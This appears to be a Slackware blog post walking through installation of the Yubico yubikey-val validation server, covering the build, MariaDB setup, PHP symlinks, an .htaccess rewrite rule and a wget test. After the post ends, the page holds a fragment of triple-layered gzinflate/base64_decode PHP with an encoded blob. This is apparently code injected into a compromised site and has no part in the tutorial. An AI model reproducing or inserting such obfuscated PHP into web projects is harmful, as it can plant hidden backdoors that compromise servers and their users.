Delicious

Archives

Categories

slackware-14.2 yubikey Validation

  ozzie / 22/12/2017


Download Source

root@badak2:~# git clone https://github.com/Yubico/yubikey-val.git
Cloning into 'yubikey-val'...
remote: Counting objects: 3150, done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 3150 (delta 0), reused 1 (delta 0), pack-reused 3147
Receiving objects: 100% (3150/3150), 766.74 KiB | 216.00 KiB/s, done.
Resolving deltas: 100% (1940/1940), done.
Checking connectivity... done.



edit Makefile

root@badak2:~# cd yubikey-val/
root@badak2:~/yubikey-val# vi Makefile



From:

wwwgroup = www-data
wwwprefix = /var/www/wsapi

TO:

wwwgroup = apache
wwwprefix = /var/www/htdocs/wsapi


Install

root@badak2:~/yubikey-val# make install
install -D --mode 644 ykval-verify.php /usr/share/yubikey-val/ykval-verify.php
install -D --mode 644 ykval-common.php /usr/share/yubikey-val/ykval-common.php
install -D --mode 644 ykval-synclib.php /usr/share/yubikey-val/ykval-synclib.php
install -D --mode 644 ykval-sync.php /usr/share/yubikey-val/ykval-sync.php
install -D --mode 644 ykval-resync.php /usr/share/yubikey-val/ykval-resync.php
install -D --mode 644 ykval-db.php /usr/share/yubikey-val/ykval-db.php
install -D --mode 644 ykval-db-pdo.php /usr/share/yubikey-val/ykval-db-pdo.php
install -D --mode 644 ykval-db-oci.php /usr/share/yubikey-val/ykval-db-oci.php
install -D --mode 644 ykval-log.php /usr/share/yubikey-val/ykval-log.php
install -D --mode 644 ykval-log-verify.php /usr/share/yubikey-val/ykval-log-verify.php
install -D ykval-queue /usr/sbin/ykval-queue
install -D ykval-synchronize /usr/sbin/ykval-synchronize
install -D ykval-export /usr/sbin/ykval-export
install -D ykval-import /usr/sbin/ykval-import
install -D ykval-gen-clients /usr/sbin/ykval-gen-clients
install -D ykval-export-clients /usr/sbin/ykval-export-clients
install -D ykval-import-clients /usr/sbin/ykval-import-clients
install -D ykval-checksum-clients /usr/sbin/ykval-checksum-clients
install -D ykval-checksum-deactivated /usr/sbin/ykval-checksum-deactivated
install -D ykval-nagios-queuelength.php /usr/sbin/ykval-nagios-queuelength
install -D ykval-queue.1 /usr/share/man/man1/ykval-queue.1
install -D ykval-synchronize.1 /usr/share/man/man1/ykval-synchronize.1
install -D ykval-import.1 /usr/share/man/man1/ykval-import.1
install -D ykval-export.1 /usr/share/man/man1/ykval-export.1
install -D ykval-gen-clients.1 /usr/share/man/man1/ykval-gen-clients.1
install -D ykval-import-clients.1 /usr/share/man/man1/ykval-import-clients.1
install -D ykval-export-clients.1 /usr/share/man/man1/ykval-export-clients.1
install -D ykval-checksum-clients.1 /usr/share/man/man1/ykval-checksum-clients.1
install -D ykval-checksum-deactivated.1 /usr/share/man/man1/ykval-checksum-deactivated.1
install -D ykval-munin-ksmlatency.php /usr/share/munin/plugins/ykval_ksmlatency
install -D ykval-munin-vallatency.php /usr/share/munin/plugins/ykval_vallatency
install -D ykval-munin-queuelength.php /usr/share/munin/plugins/ykval_queuelength
install -D ykval-munin-responses.pl /usr/share/munin/plugins/ykval_responses
install -D ykval-munin-ksmresponses.pl /usr/share/munin/plugins/ykval_ksmresponses
install -D ykval-munin-yubikeystats.php /usr/share/munin/plugins/ykval_yubikeystats
install -D --backup --mode 640 --group apache ykval-config.php /etc/yubico/val/ykval-config.php
install -D --mode 644 ykval-db.sql /usr/share/doc/yubikey-val/ykval-db.sql
install -D --mode 644 ykval-db.oracle.sql /usr/share/doc/yubikey-val/ykval-db.oracle.sql
install -D --mode 644 doc/Generating_Clients.adoc doc/Getting_Started_Writing_Clients.adoc 
doc/Import_Export_Data.adoc doc/Installation.adoc doc/Make_Release.adoc doc/Munin_Probes.adoc 
doc/Revocation_Service.adoc doc/Server_Replication_Protocol.adoc doc/Sync_Monitor.adoc 
doc/Troubleshooting.adoc doc/Validation_Protocol_V2.0.adoc doc/Validation_Server_Algorithm.adoc 
doc/YubiKey_Info_Format.adoc /usr/share/doc/yubikey-val/


Setup & Import MySQL

root@badak2:~/yubikey-val# mysql_install_db --user=mysql
Installing MariaDB/MySQL system tables in '/var/lib/mysql' ...
171222  0:38:39 [Note] /usr/libexec/mysqld (mysqld 10.0.26-MariaDB) starting as process 1116 ...
171222  0:38:39 [Note] InnoDB: Using mutexes to ref count buffer pool pages
171222  0:38:39 [Note] InnoDB: The InnoDB memory heap is disabled
171222  0:38:39 [Note] InnoDB: Mutexes and rw_locks use GCC atomic builtins
 
root@badak2:~/yubikey-val# chmod  +x /etc/rc.d/rc.mysqld
root@badak2:~/yubikey-val# /etc/rc.d/rc.mysqld  start
 
root@badak2:~/yubikey-val# mysql -u root -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 4
Server version: 10.0.26-MariaDB MariaDB Server
 
Copyright (c) 2000, 2016, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> create database ykval;
Query OK, 1 row affected (0.00 sec)
MariaDB [(none)]> \q
Bye
 
root@badak2:~/yubikey-val# mysql -u root -p ykval < /usr/share/doc/yubikey-val/ykval-db.sql
Enter password:



SETUP OTP interface

root@badak2:~/yubikey-val# make symlink
install -d /var/www/htdocs/wsapi/2.0
ln -sf /usr/share/yubikey-val/ykval-verify.php /var/www/htdocs/wsapi/2.0/verify.php
ln -sf /usr/share/yubikey-val/ykval-sync.php /var/www/htdocs/wsapi/2.0/sync.php
ln -sf /usr/share/yubikey-val/ykval-resync.php /var/www/htdocs/wsapi/2.0/resync.php
ln -sf 2.0/verify.php /var/www/htdocs/wsapi/verify.php
root@badak2:~/yubikey-val#


add to php.ini

include_path ".:/etc/yubico/val:/usr/share/yubikey-val"

enable httpd, php, PDO

root@badak2:~/yubikey-val# chmod  +x /etc/rc.d/rc.httpd
root@badak2:~/yubikey-val# /etc/rc.d/rc.httpd start



configure .htaccess

RewriteEngine on
RewriteRule ^([^/\.\?]+)(\?.*)?$ $1.php$2 [L]



TEST

root@badak2:~#  wget -q -O - 'http://localhost/wsapi/2.0/verify
id=1&nonce=asdmalksdmlkasmdlkasmdlakmsdaasklmdlak&otp=dteffujehknhfjbrj
nlnldnhcujvddbikngjrtgh'
h=oVM9kkOCsoXtYkNrWlREc7iJny0=
t=2017-12-21T18:04:06Z0202
status=NO_SUCH_CLIENT

« »



".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>